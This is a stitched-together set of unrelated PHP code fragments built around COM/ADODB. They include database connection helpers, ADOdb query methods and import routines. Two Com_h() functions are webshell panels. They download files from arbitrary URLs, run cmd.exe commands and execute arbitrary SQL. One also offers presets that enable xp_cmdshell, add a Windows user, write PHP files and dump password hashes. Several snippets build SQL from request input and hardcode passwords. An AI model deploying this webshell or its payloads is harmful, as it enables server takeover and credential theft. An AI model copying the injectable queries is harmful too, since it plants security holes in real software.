function db_connect() { global $host,$user,$pwd,$dbname,$mssql_dmy,$cCodepage,$options, $ODBCString; $connStrings = array(); if($_SESSION["MSSQLConnString"]) { $connStrings[] = $_SESSION["SQLConnString"]; } $connStrings[] = $ODBCString; // SQLOLEDB provider if($options=="SSPI") $connStrings[] = "PROVIDER=SQLOLEDB;SERVER=".$host.";DATABASE=".$dbname.";Integrated Security=SSPI"; else $connStrings[] = "PROVIDER=SQLOLEDB;SERVER=".$host.";UID=".$user.";PWD=".$pwd.";DATABASE=".$dbname; // SQLNCLI provider if($options=="SSPI") $connStrings[] = "PROVIDER=SQLNCLI;SERVER=".$host.";DATABASE=".$dbname.";Integrated Security=SSPI"; else $connStrings[] = "PROVIDER=SQLNCLI;SERVER=".$host.";UID=".$user.";PWD=".$pwd.";DATABASE=".$dbname; // go thru connection strings one by one $errorString = ""; foreach($connStrings as $connStr) { try { $conn = new COM("ADODB.Connection",NULL,$cCodepage); $conn->Open($connStr); $rs=$conn->Execute("select convert(datetime,'2000-11-22',121)"); $str=$rs->Fields[0]->Value; $y=strpos($str,"2000"); $m=strpos($str,"11"); $d=strpos($str,"22"); if($y<$m && $m<$d) $mssql_dmy="ymd"; if($d<$m && $m<$y) $mssql_dmy="dmy"; $_SESSION["MSSQLConnString"] = $connStr; return $conn; } catch(com_exception $e) { $errorString .= "<br>".$e->getMessage(); } } trigger_error($errorString, E_USER_ERROR); }
function db_connect() { global $host, $user, $pwd, $dbname, $mssql_dmy, $cCodepage; $connstr = "PROVIDER=SQLOLEDB;SERVER=" . $host . ";UID=" . $user . ";PWD=" . $pwd . ";DATABASE=" . $dbname; try { $conn = new COM("ADODB.Connection", NULL, $cCodepage); $conn->Open($connstr); $rs = $conn->Execute("select convert(datetime,'2000-11-22',121)"); $str = $rs->Fields[0]->Value; $y = strpos($str, "2000"); $m = strpos($str, "11"); $d = strpos($str, "22"); if ($y < $m && $m < $d) { $mssql_dmy = "ymd"; } if ($d < $m && $m < $y) { $mssql_dmy = "dmy"; } } catch (com_exception $e) { trigger_error($e->getMessage(), E_USER_ERROR); } return $conn; }
function _query($sql, $inputarr = false) { $dbc = $this->_connectionID; $false = false; // return rs if ($inputarr) { if (!empty($this->charPage)) { $oCmd = new COM('ADODB.Command', null, $this->charPage); } else { $oCmd = new COM('ADODB.Command'); } $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; // Map by // Check issue !!! while (list(, $val) = each($inputarr)) { $type = gettype($val); $len = strlen($val); if ($type == 'boolean') { $this->adoParameterType = 11; } else { if ($type == 'integer') { $this->adoParameterType = 3; } else { if ($type == 'double') { $this->adoParameterType = 5; } elseif ($type == 'string') { $this->adoParameterType = 202; } else { if ($val === null || !defined($val)) { $len = 1; } else { $this->adoParameterType = 130; } } } } // name, type, direction 1 = input, len, $p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, $len, $val); $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if ($dbc->Errors->Count > 0) { return $false; } return $rs; } $rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option); if ($dbc->Errors->Count > 0) { return $false; } if (!$rs) { return $false; } if ($rs->State == 0) { $true = true; return $true; // 0 = adStateClosed means no records returned } return $rs; }
$Bot = "Sogou"; } if (strpos($agent, "yahoo") > -1) { $Bot = "Yahoo!"; } if (strpos($agent, "msn") > -1) { $Bot = "MSN"; } if (strpos($agent, "ia_archiver") > -1) { $Bot = "Alexa"; } if (strpos($agent, "iaarchiver") > -1) { $Bot = "Alexa"; } if (strpos($agent, "sohu") > -1) { $Bot = "Sohu"; } if (strpos($agent, "sqworm") > -1) { $Bot = "AOL"; } if (strpos($agent, "yodaoBot") > -1) { $Bot = "Yodao"; } if (strpos($agent, "iaskspider") > -1) { $Bot = "Iask"; } $conn = new COM('ADODB.Connection') or die('can not start Active X Data Objects'); $conn->Open("DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("bot.mdb")); $shijian = date("Y-m-d h:i:s", time()); $rs = $conn->Execute("insert into bot (bot,shijian,url,serverip) values ('{$Bot}','{$shijian}','{$GetLocationURL}','{$serverip}')");
function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; print <<<END <div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> <a href="?s=h&o=wscript">[]</a> <a href="?s=h&o=application">[Shell.Application]</a> <a href="?s=h&o=downloader">[Downloader]</a></div> <form method="POST" name="hform" id="hform" action="?s=h&o={$object}"> END; if ($object == 'downloader') { $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : ''; $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe'); print <<<END <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div> <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div> <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form> END; if (!empty($_POST['durl']) && !empty($_POST['dpath'])) { echo '<div class="actall">'; $contents = @file_get_contents($_POST['durl']); if (!$contents) { echo '无法下载数据'; } else { echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败'; } echo '</div>'; } } elseif ($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; print <<<END <div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['cmd'])) { echo '<div class="actall">'; $shell = new COM('wscript'); $exe = @$shell->exec("cmd.exe /c " . $cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '<pre>' . $output . '</pre>'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt'; print <<<END <div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div> <div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['run'])) { echo '<div class="actall">'; $shell = new COM('application'); echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print <<<END <script language="javascript"> function hFull(i){ \tif(i==0 || i==5) return false; \tStr = new Array(12); \tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb"; \tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**"; \tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**"; \tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; \tStr[6] = "SELECT * FROM [TableName] WHERE ID<10"; \tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')"; \tStr[8] = "DELETE FROM [TableName] WHERE ID=1"; \tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1"; \tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; \tStr[11] = "DROP TABLE [TableName]"; \tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; \tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS"; \tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} \treturn true; } </script> <div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;"> <select onchange="return hFull(options[selectedIndex].value)"> <option value="0" selected>--连接示例--</option> <option value="1">Access连接</option> <option value="2">MsSql连接</option> <option value="3">MySql连接</option> <option value="4">Oracle连接</option> <option value="5">--SQL语法--</option> <option value="6">显示数据</option> <option value="7">添加数据</option> <option value="8">删除数据</option> <option value="9">修改数据</option> <option value="10">建数据表</option> <option value="11">删数据表</option> <option value="12">添加字段</option> <option value="13">删除字段</option> </select></div> <div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div> </form> END; if (!empty($string)) { echo '<div class="actall">'; $shell = new COM('adodb'); @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for ($i = 0; $i < $count; $i++) { $Field[$i] = $result->Fields($i); } echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>'; if (!empty($count)) { while (!$result->EOF) { for ($i = 0; $i < $count; $i++) { echo htmlspecialchars($Field[$i]->value) . '<br>'; } @$result->MoveNext(); } } $shell->Close(); @$shell->Release(); $shell = NULL; echo '</div>'; } } return true; }
function _query($sql, $inputarr = false) { $dbc = $this->_connectionID; $false = false; if ($inputarr) { if (!empty($this->charPage)) { $oCmd = new COM('ADODB.Command', null, $this->charPage); } else { $oCmd = new COM('ADODB.Command'); } $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; foreach ($inputarr as $val) { $this->adoParameterType = 130; $p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val); $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if (0 < $dbc->Errors->Count) { return $false; } return $rs; } $rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option); if (0 < $dbc->Errors->Count) { return $false; } if (!$rs) { return $false; } if ($rs->State == 0) { $true = true; return $true; } return $rs; }
function &_query($sql,$inputarr=false) { $dbc = $this->_connectionID; $false = false; // return rs if ($inputarr) { if (!empty($this->charPage)) $oCmd = new COM('ADODB.Command',null,$this->charPage); else $oCmd = new COM('ADODB.Command'); $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; foreach($inputarr as $val) { // name, type, direction 1 = input, len, $this->adoParameterType = 130; $p = $oCmd->CreateParameter('name',$this->adoParameterType,1,strlen($val),$val); //print $p->Type.' '.$p->value; $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if ($dbc->Errors->Count > 0) return $false; return $rs; } $rs = @$dbc->Execute($sql,$this->_affectedRows, $this->_execute_option); if ($dbc->Errors->Count > 0) return $false; if (! $rs) return $false; if ($rs->State == 0) { $true = true; return $true; // 0 = adStateClosed means no records returned } return $rs; }
function BASIS() { $conn = new COM("ADODB.Connection") or die("Kan ADODB niet gebruiken"); $conn->Provider = "OraOLEDB.Oracle"; $conn->ConnectionString = "Data Source=GEO;User Id=gbi; Password=zomer;"; $conn->Open(); $sql_stmt = " SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_AGGR_MBR(shape)) FROM AB_HIST_GEMEENTEGRENS_V"; $p = ""; $Recordset = $conn->Execute($sql_stmt); while (!$Recordset->EOF) { $res = $Recordset->Fields[0]->Value; $lengte = strlen($res); $pol = strpos($res, "POLYGON"); if ($pol >= 0) { $coord = substr($res, $pol + 10, $lengte - 10 - 2); } //print ($coord); //print ("<BR>"); $Recordset->MoveNext(); } $p = $coord . "|"; $Recordset->Close(); unset($Recordset); $sql_stmt = "SELECT SDO_UTIL.TO_WKTGEOMETRY(shape) FROM AB_HIST_GEMEENTEGRENS_V"; $Recordset = $conn->Execute($sql_stmt); while (!$Recordset->EOF) { $res = $Recordset->Fields[0]->Value; //print ($res . "<BR><BR>"); $lengte = strlen($res); $pol = strpos($res, "POLYGON"); if ($pol >= 0) { $coord = substr($res, $pol + 10, $lengte - 10 - 2); } $p = $p . $coord . "|"; $Recordset->MoveNext(); } $Recordset->Close(); unset($Recordset); $conn->Close(); unset($conn); CREATEPDF($p); /* $sGeo = explode("|", $p); $tokens = explode(",", $sGeo[0]); $sMin = explode(" ", $tokens[0]); $sMax = explode(" ", $tokens[2]); $sMinX = $sMin[0]; $sMinY = $sMin[1]; print ("sMinX = " . $sMin[0]); print ("sMinY = " . $sMin[1]); for ($iRecord = 1; $iRecord < (count($sGeo) - 1); $iRecord++) { $tokens = explode(",", $sGeo[$iRecord]); print ($sGeo[$iRecord]); print ("<BR><BR>"); $point = array(); for ($gRecord = 0; $gRecord < count($tokens); $gRecord++) { $sPunt = explode(" ", $tokens[$gRecord]); if ($gRecord == 0) { $sX = $sPunt[0] - $sMinX; $sY = $sPunt[1] - $sMinY; print ("gRecord = 0 "); print ($sX * 1000 / 350000); print (" "); print ($sY * 1000 / 350000); print ("<BR>"); $point[$gRecord] = ($sX * 1000 / 350000); $point[$gRecord + 1] = ($sY * 1000 / 350000); } elseif ($gRecord == (count($tokens) - 1)) { $sX = $sPunt[1] - $sMinX; $sY = $sPunt[2] - $sMinY; print ("gRecord = ubound(tokens) "); print ($sX * 1000 / 350000); print (" "); print ($sY *1000 / 350000); print ("<BR>"); $point[$gRecord] = ($sX * 1000 / 350000); $point[$gRecord + 1] = ($sY * 1000 / 350000); } else { $sX = $sPunt[1] - $sMinX; $sY = $sPunt[2]- $sMinY; print ($sX * 1000 / 350000); print (" "); print ($sY *1000 / 350000); print ("<BR>"); $point[$gRecord] = ($sX * 1000 / 350000); $point[$gRecord + 1] = ($sY * 1000 / 350000); } } unset($point); } */ }
function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; $com = array("adodb" => "ADODB.Connection", "wscript" => "", "application" => "Shell.Application"); print <<<END <div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> <a href="?s=h&o=wscript">[]</a> <a href="?s=h&o=application">[Shell.Application]</a></div> <div class="actall" style="height:200px;"> <form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br> END; $shell = new COM($com[$object]); if ($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe'; print <<<END  cmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br> command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;"> <input class="bt" type="submit" value="execute"></form><br> END; if (!empty($_POST['cmd'])) { $exe = @$shell->exec("{$cmdpath} /c " . $cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '<pre>' . $output . '</pre>'; } } elseif ($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini'; print <<<END Path:<br><input type="text" name="run" value="{$run}" style="width:600px;"> <br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;"> <br><br><input class="bt" type="submit" value="execute"></form><br> END; if (!empty($_POST['run'])) { echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild'; } } elseif ($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print <<<END <script language="javascript"> function hFull(i){ \tif(i==0 || i==10) return false; \tStr = new Array(12); \tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***"; \tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa"; \tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root"; \tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;"; Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass"; Str[6] = "DRIVER={POSTGRESQL};SERVER=;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;"; Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword"; \tStr[8] = "DSN=mydns;Uid=username;Pwd=password"; Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password"; Str[11] = "SELECT * FROM [TableName] WHERE ID<100"; \tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')"; \tStr[13] = "UPDATE [TableName] SET USER='******' WHERE ID=100"; \tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; \tStr[15] = "DROP TABLE [TableName]"; \tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');"; Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')"; Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')"; Str[23] = "Declare @s int;exec sp_oacreate '',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';"; \tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';"; Str[25] = "Exec master.dbo.xp_cmdshell 'ver';"; Str[26] = "Select Name FROM Master..SysDatabases;"; Str[27] = "select name from sysobjects where type='U';"; Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');"; Str[29] = "select username,password from dba_users;"; Str[30] = "select TABLE_NAME from all_tables;"; Str[31] = "desc admin;"; Str[32] = "grant connect,resource,dba to user_name;"; Str[33] = "select datname from pg_database;"; Str[34] = "select relname from pg_stat_user_tables;"; Str[35] = "\\\\d table_name"; Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; Str[37] = "\\\\! uname -a"; Str[38] = "select schemaname from syscat.schemata;"; Str[39] = "select name from sysibm.systables;"; Str[40] = "select colname from syscat.columns where tabname='table_name';"; Str[41] = "db2 get db cfg for db_name;"; Str[42] = "select name from sysdatabases;"; Str[43] = "select tabname from systables where tabid=n;"; Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;"; Str[45] = "select username,usertype,password from sysusers;"; if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} \treturn true; } </script> conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;"> <select onchange="return hFull(options[selectedIndex].value)"> <option value="0" selected>--select range--</option> <option value="1">Access</option> <option value="2">MsSql</option> <option value="3">MySql</option> <option value="4">Oracle</option> <option value="5">DB2</option> <option value="6">PostGreSQL</option> <option value="7">Informix</option> <option value="8">DSN</option> <option value="9">FILEDSN</option> <option value="10">--sql statement--</option> <option value="11">show data</option> <option value="12">insert data</option> <option value="13">update data</option> <option value="14">create table</option> <option value="15">drop table</option> <option value="16">add column</option> <option value="17">access shell()</option> <option value="18">add xp_cmdsehll(sql2005)</option> <option value="19">add oacreate(sql2005)</option> <option value="20">add openrowset(sql2005)</option> <option value="21">add xp_cmdsehll(sql2000)</option> <option value="22">add oacreate(sql2000)</option> <option value="23">oamethod exec</option> <option value="24">sp_makewebtask</option> <option value="25">xp_cmdshell</option> <option value="26">databases(sql)</option> <option value="27">tables(sql)</option> <option value="28">columns(sql)</option> <option value="29">hashes(oracle)</option> <option value="30">tables(oracle)</option> <option value="31">columns(oracle)</option> <option value="32">grant(oracle)</option> <option value="33">databases(pgsql)</option> <option value="34">tables(pgsql)</option> <option value="35">columns(pgsql)</option> <option value="36">pg_hba.conf(pgsql)</option> <option value="37">os-command(pgsql)</option> <option value="38">databases(db2)</option> <option value="39">tables(db2)</option> <option value="40">columns(db2)</option> <option value="41">db config(db2)</option> <option value="42">databases(informix)</option> <option value="43">tables(informix)</option> <option value="44">columns(informix)</option> <option value="45">hashes(informix)</option> </select> <br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;"> <input class="bt" type="submit" value="execute"> </form><br> END; if (!empty($string)) { @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for ($i = 0; $i < $count; $i++) { $Field[$i] = $result->Fields($i); } echo $result ? $sql . ' Done<br>' : $sql . ' Faild<br>'; if (!empty($count)) { while (!$result->EOF) { for ($i = 0; $i < $count; $i++) { echo $Field[$i]->value . '<br>'; } @$result->MoveNext(); } } $shell->Close(); } } $shell = NULL; echo '</div>'; return true; }
public function pi(Request $request) { $data = $request->all(); $connection_id = $data['connection_id']; $tagset_id = $data['tagset_id']; $cal_method = $data['cal_method']; $date_begin = $data['date_begin']; $date_end = $data['date_end']; $update_db = $data['update_db']; $int_connection = IntConnection::where(['ID' => $connection_id])->select('SERVER', 'USER_NAME', 'PASSWORD')->first(); $server = $int_connection->SERVER; $username = $int_connection->USER_NAME; $password = $int_connection->PASSWORD; $intTagSet = IntTagSet::where(['ID' => $tagset_id])->select('TAGS')->first(); $ptags = $intTagSet->TAGS; $str = ""; if ($update_db && $cal_method == "all") { return response()->json("<font color='red'>Not allow inport data with method '<b>All</b>'</font>"); } $tagcondition = ""; $tags = explode("\n", $ptags); foreach ($tags as $tag) { if ($tag) { $tagcondition .= ($tagcondition ? " or " : "") . "tag='{$tag}'"; } } if ($cal_method == "max" || $cal_method == "min") { $sql = "SELECT tt.tag,tt.TIME,tt.value\n\t\t\t\t\tFROM [piarchive].[picomp] tt\n\t\t\t\t\tinner join\n\t\t\t\t\t(\n\t\t\t\t\tSELECT tag tagx,{$cal_method}(value) mvalue\n\t\t\t\t\tFROM [piarchive].[picomp]\n\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}' group by tag\n\t\t\t\t\t) grouped on tt.tag=grouped.tagx and tt.value=grouped.mvalue\n\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\tAND value is not null\n\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}'"; } else { if ($cal_method == "first" || $cal_method == "last") { $func = $cal_method == "first" ? "min" : "max"; $sql = "SELECT tt.tag,tt.TIME,tt.value\n\t\t\t\t\t\tFROM [piarchive].[picomp] tt\n\t\t\t\t\t\tinner join\n\t\t\t\t\t\t(\n\t\t\t\t\t\tSELECT tag tagx,{$func}(time) mtime\n\t\t\t\t\t\tFROM [piarchive].[picomp]\n\t\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}' group by tag\n\t\t\t\t\t\t) grouped on tt.tag=grouped.tagx and tt.time=grouped.mtime\n\t\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\t\tAND value is not null\n\t\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}'"; } else { if ($cal_method == "average") { $sql = "SELECT tag, max(TIME) TIME, avg(value) value\n\t\t\t\t\t\tFROM picomp\n\t\t\t\t\t\tWHERE ({$tagcondition}) AND value is not null AND time BETWEEN '{$date_begin}' AND '{$date_end}'\n\t\t\t\t\t\tgroup by tag"; } else { $sql = "SELECT tag, TIME, value\n\t\t\t\t\t\tFROM picomp\n\t\t\t\t\t\tWHERE ({$tagcondition}) AND value is not null AND time BETWEEN '{$date_begin}' AND '{$date_end}'"; } } } $update_db = 'No'; if ($update_db) { $supdate_db = 'Yes'; } $str .= " <b>Import PI data</b><br>"; $str .= " Server: <b>" . $server . "</b><br>"; $str .= " Data method: <b>" . $cal_method . "</b><br>"; $str .= " Update database: <b>" . $supdate_db . "</b><br>"; $str .= " From time: <b>" . $data['date_begin'] . "</b><br>"; $str .= " To time: <b>" . $data['date_end'] . "</b><br><br>"; $connection = new \COM("ADODB.Connection") or die("Cannot start ADO"); $str .= " Open connection " . date('H:i:s') . "<br>"; $connection->Open("Initial Catalog=piarchive;\n\t\t\t\tData Source='localhost';User ID =root;Password='';"); $str .= " Begin command " . date('H:i:s') . "<br>"; $result_set = $connection->Execute($sql); $result_count = 0; $labels = array(); $str .= " Begin fetch data " . date('H:i:s') . "<br><br>"; $str .= " <table><tr><td><b>Tag</b></td><td><b>Date/time</b></td><td><b>Value</b></td><td><b>Code</b></td><td><b>Status</b></td><td><b>Command</b></td></tr>"; while (!$result_set->EOF) { $impSQL = ""; $hasError = false; $statusCode = "Y"; $err = ""; $tagID = $result_set->fields[0]->value; $date = $result_set->fields[1]->value; $value = $result_set->fields[2]->value; $r_t = int_tag_mapping::where(['TAG_ID' => $tagID])->select('*')->first(); if ($update_db) { if (count($r_t) <= 0) { $hasError = true; $statusCode = "NG"; $err = "Tag mapping not found"; } else { foreach ($r_t as $r) { $table_name = strtoupper($r[TABLE_NAME]); $column_name = strtoupper($r[COLUMN_NAME]); $cc = DB::statement("SELECT TABLE_NAME FROM `INFORMATION_SCHEMA`.`TABLES` WHERE TABLE_SCHEMA='{$db_schema}' and `TABLE_NAME`='{$table_name}' limit 1"); if (!$cc) { $hasError = true; $statusCode = "NT"; $err = "Table not found ({$table_name})"; } else { $cc = DB::statement("SELECT COLUMN_NAME FROM `INFORMATION_SCHEMA`.`COLUMNS` WHERE TABLE_SCHEMA='{$db_schema}' and `TABLE_NAME`='{$table_name}' and COLUMN_NAME='{$column_name}' limit 1"); if (!$cc) { $hasError = true; $statusCode = "NC"; $err = "Column not found ({$column_name})"; } } if (!$hasError) { $objIDField = $this->getObjectIDFiledName($table_name); $sF = ""; $sV = ""; $sWhere = "{$objIDField}={$r['OBJECT_ID']} and OCCUR_DATE=DATE('{$date}')"; if (substr($table_name, 0, 12) == "ENERGY_UNIT_") { $sWhere .= " and FLOW_PHASE={$r['FLOW_PHASE']}"; $sF .= ",FLOW_PHASE"; $sV .= ",{$r['FLOW_PHASE']}"; } if ($table_name == "ENERGY_UNIT_DATA_ALLOC") { $sWhere .= " and ALLOC_TYPE={$r['ALLOC_TYPE']}"; $sF .= ",ALLOC_TYPE"; $sV .= ",{$r['ALLOC_TYPE']}"; } $tmp = DB::statement("select ID from `{$table_name}` where {$sWhere} limit 1"); if ($tmp) { $sSQL = "update `{$table_name}` set `{$column_name}`='{$value}' where ID={$rID->ID}"; $sSQL = str_replace("''", "null", $sSQL); $impSQL .= ($impSQL ? "<bt>" : "") . $sSQL; if ($update_db) { DB::update($sSQL) or $html .= "<td>" . mysql_error() . "</td>"; $tags_override++; } } else { $sSQL = "insert into `{$table_name}`(`{$objIDField}`,OCCUR_DATE,`{$column_name}`{$sF}) values({$r['OBJECT_ID']},'{$date}','{$value}'{$sV})"; $sSQL = str_replace("''", "null", $sSQL); $impSQL .= ($impSQL ? "<bt>" : "") . $sSQL; if ($update_db) { DB::insert($sSQL) or $html .= "<td>" . mysql_error() . "</td>"; $tags_addnew++; } } $tags_loaded++; } } } } $str .= " <tr><td>" . $result_set->fields[0]->value . '</td><td>' . $result_set->fields[1]->value . '</td><td>' . $result_set->fields[2]->value . "</td><td>{$statusCode}</td><td>{$err}</td><td>{$impSQL}</td></tr>"; $result_count = $result_count + 1; $result_set->MoveNext(); } $str .= " </table><br>"; $str .= " Close connection " . date('H:i:s') . "<br>"; $str .= " <br />The number of records retrieved is: " . $result_count . "<br /><br />"; $result_set->Close(); // optional $connection->Close(); // optional $str .= " Finished " . date('H:i:s') . "<br>"; return response()->json($str); }
<?php checkauthentication(); $err = false; extract($_POST); $xmenu_p = xmenu_id($p); $p_next = $xmenu_p->parent; $th = $_SESSION['xth']; if (isset($form)) { if ($err != true) { $kdsatker_input = $_REQUEST['kdsatker']; if ($kdsatker_input != '') { $conn = new COM("ADODB.Connection"); $dirData = "c:\\xampp\\htdocs\\sireva\\file_dipa\\" . $kdsatker_input . "\\"; $conn->Open("Provider=vfpoledb.1;Data Source={$dirData};Collating Sequence=Machine"); $Data = $conn->Execute("select THANG,KDSATKER,sum(TOTNILMAK) AS jml from M_SPMIND.DBF group by THANG,KDSATKER"); $th_file = $Data->Fields(0); $kdsatker_data = $Data->Fields(1); $jumlah = $Data->Fields(2); /* echo "<strong> Tersambung SAKPA Tahun ".$th." Satker ".$kdsatker_data." </strong></<br>"; echo "<strong> Jumlah Realisasi ".$jumlah." </strong></<br>"; if ($kdsatker_input <> $kdsatker_data ){ $_SESSION['errmsg'] = "Pilihan Satker berbeda dengan Data yang tersedia"; ?> <meta http-equiv="refresh" content="0;URL=index.php?p=<?php echo $p_next ?>"><?php exit(); } # END CEK FOLDER DAN DATA
